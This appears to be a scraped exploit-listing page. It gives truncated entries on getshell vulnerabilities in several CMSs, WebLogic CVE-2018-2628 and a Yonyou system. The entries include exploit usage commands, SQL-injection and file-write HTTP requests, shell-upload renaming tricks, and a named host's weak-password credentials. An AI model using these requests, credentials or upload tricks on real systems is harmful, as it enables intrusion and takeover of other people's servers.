CVE-2022-32412

An issue in the /template/edit component of HongCMS v3.0 allows attackers to getshell...

Exploit for Deserialization of Untrusted Data in Oracle Weblogic_Server

CVE-2018-2628 WebLogic反序列化漏洞复现 weblogic getshell python CVE-2018-2628-Getshell.py ip port shell1.jsp C:\Users\CTF\Desktoppython CVE-2018-2628-Getshell.py 10.10.20.166 7001 jason1.jsp / \ \ / / | | \ / / |/ \ | \ / /| \ / \ | | \ \ / /| | | | | || | | / / | | | | \ / / | |/ /| | | || | usage:...

File Upload Vulnerability in Intimate Home Care Intimate Cat (imcat)

Intimate Cat imcat is a general-purpose website system designed in PHP+MySQL architecture. A file upload vulnerability exists in Intimate Cat imcat, which can be exploited by an attacker to upload a malicious file and then getshell it...

cscms getshell

...

XYHCMS_V3-20170614 CSRF and File Upload Vulnerabilities in the Backend

Xing Yunhai CMS XYHcms is a completely open source CMS content management system. XYHCMSV3-20170614 CSRF and file upload vulnerability exists in the background. Attackers can use this vulnerability to lure administrators to click on specially crafted links to further Getshell and gain control of...

用友某系统从弱口令到sql注射到getshell

简要描述： 弱口令、sql注射、getshell 详细说明： 系统地址： http://vip.ufida.com.cn/Frame/Index.aspx 弱口令帐号：adminnc 密码：adminnc 在自助查询处，发现注入（需要登录，注意cookie有时效） GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1 Accept: text/html, application/xhtml+xml, /...

程氏舞曲CMSPHP3.0储存型xss与后台任意文件写入漏洞

简要描述： 插入 构造的js 可 getshell 详细说明： user/space.php?ac=edit&op=zl 修改 签名处，没有 任何过滤。xss产生 后台 看了下 可以写任意格式文件。。 抓包。。 POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Referer:...

discuz! X1. 0 – X1. 5 Blind SQL injection exploit & Get Shell-vulnerability warning-the black bar safety net

Exploit Title: discuz! X1. 0 - X1. 5 Blind SQL injection exploit &Get Shell Date: 06-04-2012 Author: Hacker-Fire Category:: webapps Google dork: Powered by Discuz Tested on: Windows 7 P0c : ? Php printr ' + ------------------------------------------------- -------------------------- + Discuz! 1-1...

discuz! X1.5 Get Shell 0day

No description provided by source. ?php printr' +---------------------------------------------------------------------------+ Discuz! X1-1.5 notifycredit.php Blind SQL injection exploit by toby57 2010.11.05 mail: admin at bkey org team: http://www.bkey.org 说明:alibaba把后续getshell代码添加了下去...

Info Fisier 1.0 Shell Upload

Info Fisier 1.0 Remote File Upload Vulnerability + Author : wlhaan hacker + Email : [email protected] + Site : www.sa-hacker.com/vb + team wlhaan Hacker + Dork : Powered by Info Fisier. + The exploit : http://localhost/path/upload.php chaneg shell shell.php.sisx or shell.php.pjpeg Get now shell :...

Crafty Syntax Image Gallery <= 3.1g Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at your option any later version. This...